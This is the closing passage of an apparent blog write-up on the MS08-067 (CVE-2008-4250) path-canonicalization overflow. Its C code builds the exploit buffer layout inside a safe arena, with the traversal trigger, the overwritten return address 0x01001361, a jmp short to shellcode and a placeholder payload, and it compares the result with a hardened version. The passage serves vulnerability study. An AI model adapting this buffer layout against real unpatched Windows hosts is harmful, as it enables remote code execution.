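    b[OFF_STRAY] = 0x5C; b[OFF_STRAY + 2] = 0x5E;     /* "\^" left by earlier code */
    put_raw(b + OFF_RET, "\xF2\xDF\xBA\x71", 4);      /* return into NETAPI32 after the call */
    p = b + OFF_BUF;
    p = put_utf16(p, "\\");
    p = put_fill(p, 'B', 100);                        /* removed by the first collapse */
    p = put_fill(p, 'S', 16);
    p = put_fill(p, 0xCC, 4);                         /* stand-in for payload.encoded */
    p = put_fill(p, 'E', 16);
    p = put_utf16(p, "\\..\\..\\");                   /* triggers the bug */
    p = put_utf16(p, "AAAAAAA");
    p = put_fill(p, 'P', 4);                          /* lands just below the return address */
    p = put_raw(p, "\x61\x13\x00\x01", 4);            /* target.ret = 0x01001361 */
    p = put_fill(p, 'D', 50);
    p = put_raw(p, "\xEB\x72", 2);                    /* jmp short to the shellcode */
    p = put_fill(p, 'D', 18);
    put_fill(p, 0, 2);                                /* UTF-16 NUL */
    return (wch *)(b + OFF_BUF);
}

static uint32_t ret_slot(void)                        /* what wcscpy's retn would pop */
{
    const uint8_t *r = (const uint8_t *)g_arena + OFF_RET;
    return (uint32_t)r[0] | (uint32_t)r[1] << 8 | (uint32_t)r[2] << 16 | (uint32_t)r[3] << 24;
}
static int  arena_byte(size_t off) { return ((const uint8_t *)g_arena)[off]; }
static long demo_vuln(void)  { return canonicalize_vuln(build_arena()); }
static int  demo_fixed(void) { return canonicalize_fixed(build_arena()); }
/* Target of "EB disp8" at byte offset `at`: next instruction + sign-extended disp. */
static long jmp_short_target(long at, uint8_t disp) { return at + 2 + (int8_t)disp; }

int main(void)
{
    long d = demo_vuln();
    printf("vulnerable: last copy dest = %ld code units (%ld bytes) from the buffer, ret slot = %08x\n",
           d, d * 2, (unsigned)ret_slot());
    printf("EB 72 at +0x%02X jumps to +0x%lX, byte there = %02X\n",
           0x4A, jmp_short_target(0x4A, 0x72), arena_byte(0xBE));
    int f = demo_fixed();
    printf("hardened: returned %d, ret slot = %08x\n", f, (unsigned)ret_slot());
    return 0;
}
```

The vulnerable run reports the second copy's destination as -36 code units (0x48 bytes) below the buffer, the return-address slot changed from 71BADFF2 to 01001361, and the EB 72 written at +0x4A (011CF4B6 in the dump) jumping to +0xBE (011CF52A, the first shellcode byte); the hardened run leaves the slot untouched and returns -1. The model keeps every write inside one array on purpose, so it shows the pointer arithmetic without corrupting its own stack.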


References
https://learn.microsoft.com/zh-cn/security-updates/Securitybulletins/2008/ms08-067
https://github.com/BinRacer/ms08-067.git
Document info
- Author: BinRacer
- Link: https://BinRacer.github.io/2025/09/08/CVE-2008-4250/
- License: free to redistribute, non-commercial, no derivatives, attribution required (Creative Commons 3.0 license)